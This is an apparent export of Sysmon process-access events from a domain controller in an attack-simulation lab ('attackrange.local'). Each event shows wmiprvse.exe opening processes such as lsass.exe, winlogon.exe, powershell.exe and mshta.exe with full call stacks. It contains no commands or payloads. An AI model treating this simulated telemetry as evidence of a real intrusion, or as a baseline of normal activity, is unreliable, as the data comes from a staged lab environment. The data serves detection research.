15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.240{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.053{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 